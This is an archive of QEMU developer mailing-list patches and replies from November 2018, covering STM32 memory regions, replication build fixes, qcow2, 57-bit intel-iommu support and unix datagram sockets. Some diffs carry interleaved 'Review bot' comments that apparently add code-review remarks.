[Qemu-devel] [PATCH] Corrected memory regions

2018-11-13 Thread Seth K
I corrected these 2 memory regions based on specifications from the chip
manufacturer. The existing ranges seem to overlap and cause odd
behavior and/or crashes when trying to set up multiple UARTs.
I also played with changing MAX_SERIAL_PORTS to 8 to match the hardware,
but I did not include that in this patch as I never fully tested its
effects.
This is my first patch, I hope I did it correctly,
Seth Kintigh
---
 hw/char/stm32f2xx_usart.c  | 2 +-
 hw/timer/stm32f2xx_timer.c | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/hw/char/stm32f2xx_usart.c b/hw/char/stm32f2xx_usart.c
index 032b5fda13..f3363a2952 100644
--- a/hw/char/stm32f2xx_usart.c
+++ b/hw/char/stm32f2xx_usart.c
@@ -202,7 +202,7 @@ static void stm32f2xx_usart_init(Object *obj)
 sysbus_init_irq(SYS_BUS_DEVICE(obj), >irq);

 memory_region_init_io(>mmio, obj, _usart_ops, s,
-  TYPE_STM32F2XX_USART, 0x2000);
+  TYPE_STM32F2XX_USART, 0x400);
 sysbus_init_mmio(SYS_BUS_DEVICE(obj), >mmio);
 }
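Review bot: The new size 0x400 carries no justification in the code, so the next person comparing it with the old 0x2000 has to redo the datasheet lookup; a one-line comment above the memory_region_init_io call, `/* STM32F2xx USART register block is 0x400 bytes (see the reference manual memory map) */`, fixes that. Shrinking the region also changes what a guest sees for offsets 0x400-0x1fff: they previously reached this device's own read/write handlers and will now presumably fall to whatever the SoC maps next to it, which the commit message should state as the intended effect rather than "seem to overlap". The patch also lacks a Signed-off-by line, which blocks merging independently of the content. stm32f2xx_usart_init begins before this hunk.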

diff --git a/hw/timer/stm32f2xx_timer.c b/hw/timer/stm32f2xx_timer.c
index 58fc7b1188..ae744d1642 100644
--- a/hw/timer/stm32f2xx_timer.c
+++ b/hw/timer/stm32f2xx_timer.c
@@ -308,7 +308,7 @@ static void stm32f2xx_timer_init(Object *obj)
 sysbus_init_irq(SYS_BUS_DEVICE(obj), >irq);

 memory_region_init_io(>iomem, obj, _timer_ops, s,
-  "stm32f2xx_timer", 0x4000);
+  "stm32f2xx_timer", 0x400);
 sysbus_init_mmio(SYS_BUS_DEVICE(obj), >iomem);

 s->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, stm32f2xx_timer_interrupt,
s);
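Review bot: The 0x4000-to-0x400 change should be validated against the base addresses at which the SoC model (not in this patch) instantiates the timers, since a region larger than that spacing is exactly the overlap the message describes; stating the stride in the commit message, and a comment here such as `/* TIMx register block is 0x400 bytes per the STM32F2xx memory map */`, would let a reviewer confirm it without the datasheet. The MAX_SERIAL_PORTS remark in the description is unrelated to this hunk and should either be dropped or become its own patch. stm32f2xx_timer_init continues past the end of this hunk.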
-- 
2.11.0


[Qemu-devel] [PATCH] replication: Make --disable-replication compile

2018-11-13 Thread Peter Xu
We've fixed it before like 38bb54f323 ("replication: Make
--disable-replication compile again", 2017-04-28) but it's failing
again.  So fix it again.

There may be a cleaner way to fix this, but the current approach is the
simplest. Let's start simple.

CC: zhanghailiang 
CC: Juan Quintela 
CC: "Dr. David Alan Gilbert" 
CC: Peter Maydell 
CC: Yanan Fu 
CC: Markus Armbruster 
Reported-by: Yanan Fu 
Signed-off-by: Peter Xu 
---
 migration/colo.c | 23 +++
 1 file changed, 23 insertions(+)

diff --git a/migration/colo.c b/migration/colo.c
index 956ac236b7..78b64ef0cb 100644
--- a/migration/colo.c
+++ b/migration/colo.c
@@ -33,8 +33,10 @@
 #include "sysemu/cpus.h"
 #include "net/filter.h"
 
+#ifdef CONFIG_REPLICATION
 static bool vmstate_loading;
 static Notifier packets_compare_notifier;
+#endif
 
 #define COLO_BUFFER_BASE_SIZE (4 * 1024 * 1024)
 
@@ -59,6 +61,7 @@ static bool colo_runstate_is_stopped(void)
 
 static void secondary_vm_do_failover(void)
 {
+#ifdef CONFIG_REPLICATION
 int old_state;
 MigrationIncomingState *mis = migration_incoming_get_current();
 Error *local_err = NULL;
@@ -121,10 +124,14 @@ static void secondary_vm_do_failover(void)
 if (mis->migration_incoming_co) {
 qemu_coroutine_enter(mis->migration_incoming_co);
 }
+#else
+abort();
+#endif
 }
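Review bot: Reaching the `#else` branch calls abort() and kills the whole VM, and secondary_vm_do_failover is entered from the failover request path, so unless a non-replication build already refuses the x-colo migration capability when it is set (that check, if it exists, is not in this patch), a QMP client can trigger this abort. If that refusal does exist, say so at the abort so the next reader knows it is a true invariant rather than error handling: `abort(); /* unreachable: x-colo capability is rejected without CONFIG_REPLICATION */`. If it does not, an error_report() and early return is the safer failure mode for an operator-facing path. secondary_vm_do_failover starts in the preceding hunk.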
 
 static void primary_vm_do_failover(void)
 {
+#ifdef CONFIG_REPLICATION
 MigrationState *s = migrate_get_current();
 int old_state;
 Error *local_err = NULL;
@@ -165,6 +172,9 @@ static void primary_vm_do_failover(void)
 
 /* Notify COLO thread that failover work is finished */
 qemu_sem_post(>colo_exit_sem);
+#else
+abort();
+#endif
 }
 
 COLOMode get_colo_mode(void)
@@ -271,6 +281,8 @@ COLOStatus *qmp_query_colo_status(Error **errp)
 return s;
 }
 
+#ifdef CONFIG_REPLICATION
+
 static void colo_send_message(QEMUFile *f, COLOMessage msg,
   Error **errp)
 {
@@ -489,9 +501,11 @@ static void colo_compare_notify_checkpoint(Notifier 
*notifier, void *data)
 {
 colo_checkpoint_notify(data);
 }
+#endif
 
 static void colo_process_checkpoint(MigrationState *s)
 {
+#ifdef CONFIG_REPLICATION
 QIOChannelBuffer *bioc;
 QEMUFile *fb = NULL;
 int64_t current_time = qemu_clock_get_ms(QEMU_CLOCK_HOST);
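Review bot: The `#endif` added after colo_compare_notify_checkpoint closes the `#ifdef CONFIG_REPLICATION` opened before colo_send_message in an earlier hunk, several hundred lines up, so read in isolation it is impossible to tell what it terminates; tag it as `#endif /* CONFIG_REPLICATION */`. The same tag on the `#endif` that will close the new `#ifdef` at the top of colo_process_checkpoint would help for the same reason, since that function's `#else abort()` sits in a later hunk. colo_process_checkpoint continues past the end of this hunk.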
@@ -603,6 +617,9 @@ out:
 if (s->rp_state.from_dst_file) {
 qemu_fclose(s->rp_state.from_dst_file);
 }
+#else
+abort();
+#endif
 }
 
 void colo_checkpoint_notify(void *opaque)
@@ -631,6 +648,7 @@ void migrate_start_colo_process(MigrationState *s)
 qemu_mutex_lock_iothread();
 }
 
+#ifdef CONFIG_REPLICATION
 static void colo_wait_handle_message(QEMUFile *f, int *checkpoint_request,
  Error **errp)
 {
@@ -653,9 +671,11 @@ static void colo_wait_handle_message(QEMUFile *f, int 
*checkpoint_request,
 break;
 }
 }
+#endif
 
 void *colo_process_incoming_thread(void *opaque)
 {
+#ifdef CONFIG_REPLICATION
 MigrationIncomingState *mis = opaque;
 QEMUFile *fb = NULL;
 QIOChannelBuffer *bioc = NULL; /* Cache incoming device state */
@@ -859,4 +879,7 @@ out:
 
 rcu_unregister_thread();
 return NULL;
+#else
+abort();
+#endif
 }
-- 
2.17.1




Re: [Qemu-devel] [for 3.1? PATCH] qcow2: Assert that refcount block offsets fit in the refcount table

2018-11-13 Thread Alberto Garcia
On Tue 13 Nov 2018 06:06:54 PM CET, Eric Blake  wrote:

>> Refcount table entries have a field to store the offset of the
>> refcount block. The rest of the bits of the entry are currently
>> reserved.
>> 
>> The offset is always taken from the entry using REFT_OFFSET_MASK to
>> ensure that we only use the bits that belong to that field.
>> 
>> While that mask is used every time we read from the refcount table, it
>> is never used when we write to it. Due to the other constraints of the
>> qcow2 format QEMU can never produce refcount block offsets that don't
>> fit in that field so any such offset when allocating a refcount block
>> would indicate a bug in QEMU.
>> ---
>>   block/qcow2-refcount.c | 3 +++
>>   1 file changed, 3 insertions(+)
>> 
>
> Reviewed-by: Eric Blake 

Yes, for 3.1, shall I resend it with the updated subject message?

Berto



Re: [Qemu-devel] [PATCH v2 3/3] intel-iommu: extend iotlb search logic to cover 57-bit IOVA.

2018-11-13 Thread Yu Zhang
On Wed, Nov 14, 2018 at 02:41:15PM +0800, Peter Xu wrote:
> On Wed, Nov 14, 2018 at 02:04:44PM +0800, Yu Zhang wrote:
> > The 64-bit key used by vtd_lookup_iotlb() to search the cached
> > mappings is formed by combining the GFN, source id and the page
> > level. To cover 57-bit IOVA, the shift of source id and of page
> > level need to be enlarged by 9 - the stride of one paging structure
> > level.
> > 
> > Signed-off-by: Yu Zhang 
> 
> Reviewed-by: Peter Xu 
> 
> But note that we should have this patch either squashed into previous
> patch, or at least it should appear earlier than patch 2 since
> otherwise patch 2 could possibly break.  I would prefer squashing
> since it's really part of patch 2, and please feel free to pick my r-b
> if you want to resend with a squashed version in the future.
> 

Got it. Thanks, Peter. Will send the squashed patch right after the release. :)

> Regards,
> 
> -- 
> Peter Xu

B.R.
Yu



Re: [Qemu-devel] [PATCH v2 3/3] intel-iommu: extend iotlb search logic to cover 57-bit IOVA.

2018-11-13 Thread Peter Xu
On Wed, Nov 14, 2018 at 02:04:44PM +0800, Yu Zhang wrote:
> The 64-bit key used by vtd_lookup_iotlb() to search the cached
> mappings is formed by combining the GFN, source id and the page
> level. To cover 57-bit IOVA, the shift of source id and of page
> level need to be enlarged by 9 - the stride of one paging structure
> level.
> 
> Signed-off-by: Yu Zhang 

Reviewed-by: Peter Xu 

But note that we should have this patch either squashed into previous
patch, or at least it should appear earlier than patch 2 since
otherwise patch 2 could possibly break.  I would prefer squashing
since it's really part of patch 2, and please feel free to pick my r-b
if you want to resend with a squashed version in the future.

Regards,

-- 
Peter Xu



Re: [Qemu-devel] [PATCH v2 2/3] intel-iommu: extend VTD emulation to allow 57-bit IOVA address width.

2018-11-13 Thread Peter Xu
On Wed, Nov 14, 2018 at 02:04:43PM +0800, Yu Zhang wrote:
> A 5-level paging capable VM may choose to use 57-bit IOVA address width.
> E.g. guest applications may prefer to use its VA as IOVA when performing
> VFIO map/unmap operations, to avoid the burden of managing the IOVA space.
> 
> This patch extends the current vIOMMU logic to cover the extended address
> width. When creating a VM with 5-level paging feature, one can choose to
> create a virtual VTD with 5-level paging capability, with configurations
> like "-device intel-iommu,x-aw-bits=57".
> 
> Signed-off-by: Yu Zhang 

Reviewed-by: Peter Xu 

-- 
Peter Xu



Re: [Qemu-devel] [PATCH v2 1/3] intel-iommu: differentiate host address width from IOVA address width.

2018-11-13 Thread Peter Xu
On Wed, Nov 14, 2018 at 02:04:42PM +0800, Yu Zhang wrote:
> Currently, vIOMMU is using the value of IOVA address width, instead of
> the host address width(HAW) to calculate the number of reserved bits in
> data structures such as root entries, context entries, and entries of
> DMA paging structures etc.
> 
> However values of IOVA address width and of the HAW may not equal. For
> example, a 48-bit IOVA can only be mapped to host addresses no wider than
> 46 bits. Using 48, instead of 46 to calculate the reserved bit may result
> in an invalid IOVA being accepted.
> 
> To fix this, a new field - haw_bits is introduced in struct IntelIOMMUState,
> whose value is initialized based on the maximum physical address set to
> guest CPU. Also, definitions such as VTD_HOST_AW_39/48BIT etc. are renamed
> to clarify.
> 
> Signed-off-by: Yu Zhang 

Reviewed-by: Peter Xu 

-- 
Peter Xu



[Qemu-devel] [PATCH v2 1/3] intel-iommu: differentiate host address width from IOVA address width.

2018-11-13 Thread Yu Zhang
Currently, vIOMMU is using the value of IOVA address width, instead of
the host address width(HAW) to calculate the number of reserved bits in
data structures such as root entries, context entries, and entries of
DMA paging structures etc.

However values of IOVA address width and of the HAW may not equal. For
example, a 48-bit IOVA can only be mapped to host addresses no wider than
46 bits. Using 48, instead of 46 to calculate the reserved bit may result
in an invalid IOVA being accepted.

To fix this, a new field - haw_bits is introduced in struct IntelIOMMUState,
whose value is initialized based on the maximum physical address set to
guest CPU. Also, definitions such as VTD_HOST_AW_39/48BIT etc. are renamed
to clarify.

Signed-off-by: Yu Zhang 
---
Cc: "Michael S. Tsirkin"  
Cc: Igor Mammedov  
Cc: Marcel Apfelbaum 
Cc: Paolo Bonzini  
Cc: Richard Henderson  
Cc: Eduardo Habkost 
Cc: Peter Xu 
---
 hw/i386/acpi-build.c  |  2 +-
 hw/i386/intel_iommu.c | 55 ---
 include/hw/i386/intel_iommu.h |  9 +++
 3 files changed, 37 insertions(+), 29 deletions(-)

diff --git a/hw/i386/acpi-build.c b/hw/i386/acpi-build.c
index 236a20e..b989523 100644
--- a/hw/i386/acpi-build.c
+++ b/hw/i386/acpi-build.c
@@ -2431,7 +2431,7 @@ build_dmar_q35(GArray *table_data, BIOSLinker *linker)
 }
 
 dmar = acpi_data_push(table_data, sizeof(*dmar));
-dmar->host_address_width = intel_iommu->aw_bits - 1;
+dmar->host_address_width = intel_iommu->haw_bits - 1;
 dmar->flags = dmar_flags;
 
 /* DMAR Remapping Hardware Unit Definition structure */
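Review bot: The DMAR HAW field now derives from haw_bits rather than aw_bits, which matches what the field means, but nothing in this hunk records that haw_bits is filled in by the IOMMU's own init from the CPU's phys_bits (visible as context in patch 2/3) or that the table build presumably runs after that init; a short comment would pin the dependency: `/* HAW is the host (guest-physical) width set by vtd_init, not the IOVA width */`. build_dmar_q35 begins before this hunk and continues after it.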
diff --git a/hw/i386/intel_iommu.c b/hw/i386/intel_iommu.c
index d97bcbc..0e88c63 100644
--- a/hw/i386/intel_iommu.c
+++ b/hw/i386/intel_iommu.c
@@ -707,7 +707,8 @@ static VTDBus *vtd_find_as_from_bus_num(IntelIOMMUState *s, 
uint8_t bus_num)
  */
 static int vtd_iova_to_slpte(VTDContextEntry *ce, uint64_t iova, bool is_write,
  uint64_t *slptep, uint32_t *slpte_level,
- bool *reads, bool *writes, uint8_t aw_bits)
+ bool *reads, bool *writes, uint8_t aw_bits,
+ uint8_t haw_bits)
 {
 dma_addr_t addr = vtd_ce_get_slpt_base(ce);
 uint32_t level = vtd_ce_get_level(ce);
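Review bot: vtd_iova_to_slpte now takes two widths, aw_bits and haw_bits, and the hunk gives no guidance on which bounds what; the function's header comment (above the hunk) should state that aw_bits bounds the IOVA being walked while haw_bits bounds the physical addresses extracted from page-structure entries, since the vtd_get_slpte_addr call later in this function switches to haw_bits. It is also worth confirming that the reserved-bit check applied to each slpte during this walk (outside the hunk) is built from haw_bits as well, so an entry carrying address bits above haw_bits is rejected rather than silently masked off. The function continues past this hunk.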
@@ -760,7 +761,7 @@ static int vtd_iova_to_slpte(VTDContextEntry *ce, uint64_t 
iova, bool is_write,
 *slpte_level = level;
 return 0;
 }
-addr = vtd_get_slpte_addr(slpte, aw_bits);
+addr = vtd_get_slpte_addr(slpte, haw_bits);
 level--;
 }
 }
@@ -783,6 +784,7 @@ typedef struct {
 void *private;
 bool notify_unmap;
 uint8_t aw;
+uint8_t haw;
 uint16_t domain_id;
 } vtd_page_walk_info;
 
@@ -925,7 +927,7 @@ static int vtd_page_walk_level(dma_addr_t addr, uint64_t 
start,
  * This is a valid PDE (or even bigger than PDE).  We need
  * to walk one further level.
  */
-ret = vtd_page_walk_level(vtd_get_slpte_addr(slpte, info->aw),
+ret = vtd_page_walk_level(vtd_get_slpte_addr(slpte, info->haw),
   iova, MIN(iova_next, end), level - 1,
   read_cur, write_cur, info);
 } else {
@@ -942,7 +944,7 @@ static int vtd_page_walk_level(dma_addr_t addr, uint64_t 
start,
 entry.perm = IOMMU_ACCESS_FLAG(read_cur, write_cur);
 entry.addr_mask = ~subpage_mask;
 /* NOTE: this is only meaningful if entry_valid == true */
-entry.translated_addr = vtd_get_slpte_addr(slpte, info->aw);
+entry.translated_addr = vtd_get_slpte_addr(slpte, info->haw);
 ret = vtd_page_walk_one(, info);
 }
 
@@ -1002,7 +1004,7 @@ static int vtd_dev_to_context_entry(IntelIOMMUState *s, 
uint8_t bus_num,
 return -VTD_FR_ROOT_ENTRY_P;
 }
 
-if (re.rsvd || (re.val & VTD_ROOT_ENTRY_RSVD(s->aw_bits))) {
+if (re.rsvd || (re.val & VTD_ROOT_ENTRY_RSVD(s->haw_bits))) {
 trace_vtd_re_invalid(re.rsvd, re.val);
 return -VTD_FR_ROOT_ENTRY_RSVD;
 }
@@ -1019,7 +1021,7 @@ static int vtd_dev_to_context_entry(IntelIOMMUState *s, 
uint8_t bus_num,
 }
 
 if ((ce->hi & VTD_CONTEXT_ENTRY_RSVD_HI) ||
-   (ce->lo & VTD_CONTEXT_ENTRY_RSVD_LO(s->aw_bits))) {
+   (ce->lo & VTD_CONTEXT_ENTRY_RSVD_LO(s->haw_bits))) {
 trace_vtd_ce_invalid(ce->hi, ce->lo);
 return -VTD_FR_CONTEXT_ENTRY_RSVD;
 }
@@ -1056,6 +1058,7 @@ static int 
vtd_sync_shadow_page_table_range(VTDAddressSpace *vtd_as,
 .private = (void *)_as->iommu,
 .notify_unmap = true,
 .aw = s->aw_bits,
+.haw = s->haw_bits,
 .as = vtd_as,
 .domain_id = VTD_CONTEXT_ENTRY_DID(ce->hi),
 };
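Review bot: This initializer sets the new `.haw` member, but vtd_page_walk_info is a plain struct and vtd_page_walk_level now reads `info->haw` for every next-level address (earlier hunks); any other place in the file that fills a vtd_page_walk_info without `.haw = s->haw_bits` would walk with haw 0 and have every table address masked to nothing. The patch touches only this initializer, so please confirm there is no other one (the replay path is the usual suspect) and, if there is, add the member there too. vtd_sync_shadow_page_table_range begins before this hunk and continues after it.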
@@ -1360,7 +1363,7 @@ static bool vtd_do_iommu_translate(VTDAddressSpace 
*vtd_as, PCIBus *bus,
 }
 
 ret_fr = vtd_iova_to_slpte(, 

[Qemu-devel] [PATCH v2 2/3] intel-iommu: extend VTD emulation to allow 57-bit IOVA address width.

2018-11-13 Thread Yu Zhang
A 5-level paging capable VM may choose to use a 57-bit IOVA address width.
E.g. guest applications may prefer to use their VA as IOVA when performing
VFIO map/unmap operations, to avoid the burden of managing the IOVA space.

This patch extends the current vIOMMU logic to cover the extended address
width. When creating a VM with 5-level paging feature, one can choose to
create a virtual VTD with 5-level paging capability, with configurations
like "-device intel-iommu,x-aw-bits=57".

Signed-off-by: Yu Zhang 
---
Cc: "Michael S. Tsirkin" 
Cc: Marcel Apfelbaum 
Cc: Paolo Bonzini 
Cc: Richard Henderson 
Cc: Eduardo Habkost 
Cc: Peter Xu 
---
 hw/i386/intel_iommu.c  | 53 --
 hw/i386/intel_iommu_internal.h |  6 +
 include/hw/i386/intel_iommu.h  |  1 +
 3 files changed, 48 insertions(+), 12 deletions(-)

diff --git a/hw/i386/intel_iommu.c b/hw/i386/intel_iommu.c
index 0e88c63..871110c 100644
--- a/hw/i386/intel_iommu.c
+++ b/hw/i386/intel_iommu.c
@@ -664,16 +664,16 @@ static inline bool vtd_iova_range_check(uint64_t iova, 
VTDContextEntry *ce,
 
 /*
  * Rsvd field masks for spte:
- * Index [1] to [4] 4k pages
- * Index [5] to [8] large pages
+ * Index [1] to [5] 4k pages
+ * Index [6] to [10] large pages
  */
-static uint64_t vtd_paging_entry_rsvd_field[9];
+static uint64_t vtd_paging_entry_rsvd_field[11];
 
 static bool vtd_slpte_nonzero_rsvd(uint64_t slpte, uint32_t level)
 {
 if (slpte & VTD_SL_PT_PAGE_SIZE_MASK) {
 /* Maybe large page */
-return slpte & vtd_paging_entry_rsvd_field[level + 4];
+return slpte & vtd_paging_entry_rsvd_field[level + 5];
 } else {
 return slpte & vtd_paging_entry_rsvd_field[level];
 }
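Review bot: The `level` used to index vtd_paging_entry_rsvd_field comes from the guest-written context entry (vtd_ce_get_level, visible in patch 1/3), so the new upper index of 10 is only safe if levels above the advertised ones are still refused before any slpte is checked; this patch adds VTD_CAP_SAGAW_57bit only for aw_bits == 57, so the level-5 indices must stay unreachable for 39/48-bit configurations, presumably via the existing check against CAP.SAGAW when the context entry is fetched (not visible here). A comment on the array would make the bound explicit: `/* indexed by level (1..5), or level + 5 for large pages; level is validated against CAP.SAGAW before use */`. vtd_slpte_nonzero_rsvd is complete within this hunk.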
@@ -3127,6 +3127,8 @@ static void vtd_init(IntelIOMMUState *s)
  VTD_CAP_SAGAW_39bit | VTD_CAP_MGAW(s->aw_bits);
 if (s->aw_bits == VTD_AW_48BIT) {
 s->cap |= VTD_CAP_SAGAW_48bit;
+} else if (s->aw_bits == VTD_AW_57BIT) {
+s->cap |= VTD_CAP_SAGAW_57bit | VTD_CAP_SAGAW_48bit;
 }
 s->ecap = VTD_ECAP_QI | VTD_ECAP_IRO;
 s->haw_bits = cpu->phys_bits;
@@ -3139,10 +3141,12 @@ static void vtd_init(IntelIOMMUState *s)
 vtd_paging_entry_rsvd_field[2] = VTD_SPTE_PAGE_L2_RSVD_MASK(s->haw_bits);
 vtd_paging_entry_rsvd_field[3] = VTD_SPTE_PAGE_L3_RSVD_MASK(s->haw_bits);
 vtd_paging_entry_rsvd_field[4] = VTD_SPTE_PAGE_L4_RSVD_MASK(s->haw_bits);
-vtd_paging_entry_rsvd_field[5] = VTD_SPTE_LPAGE_L1_RSVD_MASK(s->haw_bits);
-vtd_paging_entry_rsvd_field[6] = VTD_SPTE_LPAGE_L2_RSVD_MASK(s->haw_bits);
-vtd_paging_entry_rsvd_field[7] = VTD_SPTE_LPAGE_L3_RSVD_MASK(s->haw_bits);
-vtd_paging_entry_rsvd_field[8] = VTD_SPTE_LPAGE_L4_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[5] = VTD_SPTE_PAGE_L5_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[6] = VTD_SPTE_LPAGE_L1_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[7] = VTD_SPTE_LPAGE_L2_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[8] = VTD_SPTE_LPAGE_L3_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[9] = VTD_SPTE_LPAGE_L4_RSVD_MASK(s->haw_bits);
+vtd_paging_entry_rsvd_field[10] = VTD_SPTE_LPAGE_L5_RSVD_MASK(s->haw_bits);
 
 if (x86_iommu->intr_supported) {
 s->ecap |= VTD_ECAP_IR | VTD_ECAP_MHMV;
@@ -3241,6 +3245,23 @@ static AddressSpace *vtd_host_dma_iommu(PCIBus *bus, 
void *opaque, int devfn)
 return _as->as;
 }
 
+static bool host_has_la57(void)
+{
+uint32_t ecx, unused;
+
+host_cpuid(7, 0, , , , );
+return ecx & CPUID_7_0_ECX_LA57;
+}
+
+static bool guest_has_la57(void)
+{
+CPUState *cs = first_cpu;
+X86CPU *cpu = X86_CPU(cs);
+CPUX86State *env = >env;
+
+return env->features[FEAT_7_0_ECX] & CPUID_7_0_ECX_LA57;
+}
+
 static bool vtd_decide_config(IntelIOMMUState *s, Error **errp)
 {
 X86IOMMUState *x86_iommu = X86_IOMMU_DEVICE(s);
@@ -3267,11 +3288,19 @@ static bool vtd_decide_config(IntelIOMMUState *s, Error 
**errp)
 }
 }
 
-/* Currently only address widths supported are 39 and 48 bits */
+/* Currently address widths supported are 39, 48, and 57 bits */
 if ((s->aw_bits != VTD_AW_39BIT) &&
-(s->aw_bits != VTD_AW_48BIT)) {
-error_setg(errp, "Supported values for x-aw-bits are: %d, %d",
-   VTD_AW_39BIT, VTD_AW_48BIT);
+(s->aw_bits != VTD_AW_48BIT) &&
+(s->aw_bits != VTD_AW_57BIT)) {
+error_setg(errp, "Supported values for x-aw-bits are: %d, %d, %d",
+   VTD_AW_39BIT, VTD_AW_48BIT, VTD_AW_57BIT);
+return false;
+}
+
+if ((s->aw_bits == VTD_AW_57BIT) &&
+!(host_has_la57() && guest_has_la57())) {
+error_setg(errp, "Do not support 57-bit DMA address, unless both "
+ "host and guest are capable of 5-level paging");
 return false;
 }
 
diff --git a/hw/i386/intel_iommu_internal.h b/hw/i386/intel_iommu_internal.h
index d084099..a7ef24b 

[Qemu-devel] [PATCH v2 3/3] intel-iommu: extend iotlb search logic to cover 57-bit IOVA.

2018-11-13 Thread Yu Zhang
The 64-bit key used by vtd_lookup_iotlb() to search the cached
mappings is formed by combining the GFN, source id and the page
level. To cover 57-bit IOVA, the shift of source id and of page
level need to be enlarged by 9 - the stride of one paging structure
level.

Signed-off-by: Yu Zhang 
---
Cc: "Michael S. Tsirkin" 
Cc: Marcel Apfelbaum 
Cc: Paolo Bonzini  
Cc: Richard Henderson  
Cc: Eduardo Habkost 
Cc: Peter Xu 
---
 hw/i386/intel_iommu_internal.h | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/hw/i386/intel_iommu_internal.h b/hw/i386/intel_iommu_internal.h
index a7ef24b..2b29b6f 100644
--- a/hw/i386/intel_iommu_internal.h
+++ b/hw/i386/intel_iommu_internal.h
@@ -114,8 +114,8 @@
  VTD_INTERRUPT_ADDR_FIRST + 1)
 
 /* The shift of source_id in the key of IOTLB hash table */
-#define VTD_IOTLB_SID_SHIFT 36
-#define VTD_IOTLB_LVL_SHIFT 52
+#define VTD_IOTLB_SID_SHIFT 45
+#define VTD_IOTLB_LVL_SHIFT 61
 #define VTD_IOTLB_MAX_SIZE  1024/* Max size of the hash table */
 
 /* IOTLB_REG */
-- 
1.9.1




[Qemu-devel] [PATCH v2 0/3] intel-iommu: add support for 5-level virtual IOMMU.

2018-11-13 Thread Yu Zhang
Intel's upcoming processors will extend maximum linear address width to
57 bits, and introduce 5-level paging for CPU. Meanwhile, the platform
will also extend the maximum guest address width for IOMMU to 57 bits,
thus introducing the 5-level paging for 2nd level translation(See chapter
3 in Intel Virtualization Technology for Directed I/O). 

This patch series extends the current logic to support a wider address width.
A 5-level paging capable IOMMU(for 2nd level translation) can be rendered
with configuration "device intel-iommu,x-aw-bits=57".

Also, kvm-unit-tests were updated to verify this patch series. Patch for
the test was sent out at: https://www.spinics.net/lists/kvm/msg177425.html.

Note: this patch series checks the existence of 5-level paging in the host
and in the guest, and rejects configurations for 57-bit IOVA if either check
fails (VT-d hardware shall not support 57-bit IOVA on platforms without CPU
5-level paging). However, the current vIOMMU implementation still lacks logic to
check against the physical IOMMU capability; future enhancements are expected
to do this.

Changes in V2:
- Address comments from Peter Xu: add haw member in vtd_page_walk_info.
- Address comments from Peter Xu: only searches for 4K/2M/1G mappings in
iotlb are meaningful. 
- Address comments from Peter Xu: cover letter changes(e.g. mention the test
patch in kvm-unit-tests).
- Coding style changes.


Yu Zhang (3):
  intel-iommu: differentiate host address width from IOVA address width.
  intel-iommu: extend VTD emulation to allow 57-bit IOVA address width.
  intel-iommu: extend iotlb search logic to cover 57-bit IOVA.
---
Cc: "Michael S. Tsirkin"  
Cc: Igor Mammedov  
Cc: Marcel Apfelbaum 
Cc: Paolo Bonzini  
Cc: Richard Henderson  
Cc: Eduardo Habkost 
Cc: Peter Xu 


 hw/i386/acpi-build.c   |  2 +-
 hw/i386/intel_iommu.c  | 96 +-
 hw/i386/intel_iommu_internal.h | 10 -
 include/hw/i386/intel_iommu.h  | 10 +++--
 4 files changed, 81 insertions(+), 37 deletions(-)

-- 
1.9.1




Re: [Qemu-devel] [PATCH] RFC: net/socket: learn to talk with a unix dgram socket

2018-11-13 Thread Jason Wang



On 2018/11/10 上午3:56, Marc-André Lureau wrote:

-net socket has a fd argument, and may be passed pre-opened sockets.

TCP sockets use framing.
UDP sockets have datagram boundaries.

When given a unix dgram socket, it will be able to read from it, but
will attempt to send on the dgram_dst, which is unset. The other end
will not receive the data.

Let's teach -net socket to recognize a UNIX DGRAM socket, and use the
regular send() command (without dgram_dst).

This makes running slirp out-of-process possible that
way (python pseudo-code):

a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)

subprocess.Popen('qemu -net socket,fd=%d -net user' % a.fileno(), shell=True)
subprocess.Popen('qemu ... -net nic -net socket,fd=%d' % b.fileno(), shell=True)

(to make slirp a seperate project altogether, we would have to have
some compatibility code and/or deprecate various options & HMP
commands for dynamic port forwarding etc - but this looks like a
reachable goal)

Signed-off-by: Marc-André Lureau 



Rather than supporting only unnamed sockets, shouldn't we also support
named ones through the CLI?




---
  net/socket.c | 25 +
  1 file changed, 21 insertions(+), 4 deletions(-)

diff --git a/net/socket.c b/net/socket.c
index 7095eb749f..8a9c30892d 100644
--- a/net/socket.c
+++ b/net/socket.c
@@ -119,9 +119,13 @@ static ssize_t net_socket_receive_dgram(NetClientState 
*nc, const uint8_t *buf,
  ssize_t ret;
  
  do {

-ret = qemu_sendto(s->fd, buf, size, 0,
-  (struct sockaddr *)>dgram_dst,
-  sizeof(s->dgram_dst));
+if (s->dgram_dst.sin_family != AF_UNIX) {
+ret = qemu_sendto(s->fd, buf, size, 0,
+  (struct sockaddr *)>dgram_dst,
+  sizeof(s->dgram_dst));
+} else {
+ret = send(s->fd, buf, size, 0);
+}



Any reason that send is a must here? send(2) said:
   call

   send(sockfd, buf, len, flags);

   is equivalent to

   sendto(sockfd, buf, len, flags, NULL, 0);


Thanks



  } while (ret == -1 && errno == EINTR);
  
  if (ret == -1 && errno == EAGAIN) {

@@ -322,6 +326,15 @@ static NetSocketState 
*net_socket_fd_init_dgram(NetClientState *peer,
  int newfd;
  NetClientState *nc;
  NetSocketState *s;
+SocketAddress *sa;
+SocketAddressType sa_type;
+
+sa = socket_local_address(fd, errp);
+if (!sa) {
+return NULL;
+}
+sa_type = sa->type;
+qapi_free_SocketAddress(sa);
  
  /* fd passed: multicast: "learn" dgram_dst address from bound address and save it

   * Because this may be "shared" socket from a "master" process, datagrams 
would be recv()
@@ -365,8 +378,12 @@ static NetSocketState 
*net_socket_fd_init_dgram(NetClientState *peer,
   "socket: fd=%d (cloned mcast=%s:%d)",
   fd, inet_ntoa(saddr.sin_addr), ntohs(saddr.sin_port));
  } else {
+if (sa_type == SOCKET_ADDRESS_TYPE_UNIX) {
+s->dgram_dst.sin_family = AF_UNIX;
+}
+
  snprintf(nc->info_str, sizeof(nc->info_str),
- "socket: fd=%d", fd);
+ "socket: fd=%d %s", fd, SocketAddressType_str(sa_type));
  }
  
  return s;
